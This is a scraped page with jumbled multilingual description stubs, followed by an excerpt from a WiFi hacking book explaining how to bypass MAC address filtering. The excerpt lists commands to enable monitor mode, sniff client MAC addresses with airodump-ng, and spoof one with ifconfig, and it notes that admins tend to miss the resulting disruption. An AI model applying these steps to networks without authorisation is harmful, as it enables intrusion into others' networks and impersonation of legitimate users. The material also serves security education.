Descripción: Guía introductoria al hacking de redes WiFi, por Karina Astudillo B. ¿Ha querido incursionar en el hacking de redes inalámbricas, pero no sabe cómo empezar? En esta breve guía se explican con...
Descrição: Guía introductoria al hacking de redes WiFi, por Karina Astudillo B. ¿Ha querido incursionar en el hacking de redes inalámbricas, pero no sabe cómo empezar? En esta breve guía se explican con...
hay
Full description
Full description
Description complète
Full description
Full description
Descrição completa
Full description
seminar by gouthami
Descripción completa
Descripción: hacking
Tells about hackingFull description
Hacking
3001 Comms
face book haching
2 Chapter 2
Wireless security (half) measures: An overview Chapter outline: 1. MAC address filtering 2. Disabling ESSID broadcast 3. Limiting wireless coverage
MAC address filtering A sniffer is an application designed to eavesdrop (or sniff) on network traffic. With it, you might be able to capture any network packet provided some conditions are met. One of the access point security tactics is enabling MAC address filtering. When you try to authenticate with a network and get no response, it probably means you are out of range of the wireless signal. But the other possibility is that the network administrator has enabled the MAC address filtering feature. But how can
32
Chapter 2 – Wireless security (half) measures: An overview
a black-hat hacker impersonate a rightful client to access a targeted network? Let’s explain this by looking at the hacker’s actions step by step. First, some background. A MAC address is a unique hardware identifier on a wired or wireless network much like an IP address is a unique identifier in the Internet. The theory is that every network card should have a unique MAC address burned into it. The MAC address is 6 bytes in length separated by colons: check below to see what it looks like. While occasionally MAC addresses will be duplicated in a pool, this incident is very rare in WLANs. An ever-widening collection of software can allow you to freely spoof the MAC address values, and because of this it is unwarranted to rely on an approved MAC address list of networking gear that can be authenticated as a security silver bullet. Let’s see how this countermeasure can be obliterated. To spoof a MAC address in Linux, simply run this command: # ifconfig wlan1 hw ether 00:0F:B5:34:30:30
The parameters: ifconfig: the program that configures a wireless network
interface wlan1: the wireless network interface name hw ether: the option sets the MAC address of the interface 00:0F:B5:34:30:30: the new MAC address to set
Right: you know that a MAC address can be forged and know how to spoof it. But what hardware address should be selected? The new
MAC address filtering
33
address must be in the MAC address pool assigned for the network. All you need to do is to check available MAC addresses in the pool. The tool for the job is the airodump-ng application (to be precise, a sniffer). The program can look up the hardware addresses of hosts that are active at the time of running it. Before you start it, the interface operating mode needs to be set to monitor. Run this command: # iwconfig wlan1 mode monitor
The parameters: wlan1: the wireless network interface name mode monitor: the mode name to be set Airodump-ng can begin the scanning: # airodump-ng wlan1
The parameters: airodump-ng: the sniffer name wlan1: sets the interface to be used to monitor wireless activity
Before we go any further, there are some errors that can crop up as early as this stage. If you have not taken care to get the right drivers, your wireless network interface will not be set in monitor mode, prompting an error message. The second of the commands we discussed starts the sniffer. The role of this application is to scan on selected channels (a wireless card can receive data on one channel at a time). The first line shows the currently scanned channel, elapsed running time and current
34
Chapter 2 – Wireless security (half) measures: An overview
date and time. The next line provides titles for each column, and the lines after it show detected access points. CH 3 ][ Elapsed: BSSID 00:19:5B:B3:##:## 00:1E:E5:8D:##:## 00:19:E0:A4:##:## 00:15:E9:E4:##:## 00:16:41:8E:##:## BSSID 00:19:5B:B3:##:##
Here’s a quick explanation of the fields: BSSID: the basic service set identification; here it is equivalent to
the MAC address of the access point PWR: signal level (power) Beacons: number of captured ESSID broadcasts #Data: number of captured data packets #/s: number of #Data packets per second CH: number of the channel used by the network MB: maximum transfer (as specified in the standard) ENC: used encryption (OPN/WEP/WPA/WPA2) CIPHER: used cipher (WEP/WEP40/WEP104/TKIP/CCMP/
WRAP) AUTH: used authentication protocol (SKA/PSK/MGT) ESSID: the wireless network name
MAC address filtering
35
The second section lists client stations: BSSID: the MAC address of the access point the client is associated
with STATION: the MAC address of the client PWR: signal level (its range depends on the card driver: the higher
the value, the stronger the signal) Rate: the maximum achievable speed of data transfer in
the station Lost: number of packets lost over the last 10 seconds Packets: number of data packets sent by the client Probes: the network name the client is trying to connect to
The AP list section is followed by a client list. The sniffer can only detect those clients that were logged in when it was running. Jot down the MAC address in the Station column (choose a client with a BSSID corresponding to a particular network) and wait for the user to log out. If you were to connect at the same time, this would cause the network to act up (for the two users, since with two devices on the network having the same hardware address, data transmission becomes complicated). While this activity could draw the attention of a scrupulous network administrator, it is habitually blamed on the ‘flaky’ nature of an access point by users, and administrators often believe the issue lies in client misconfiguration.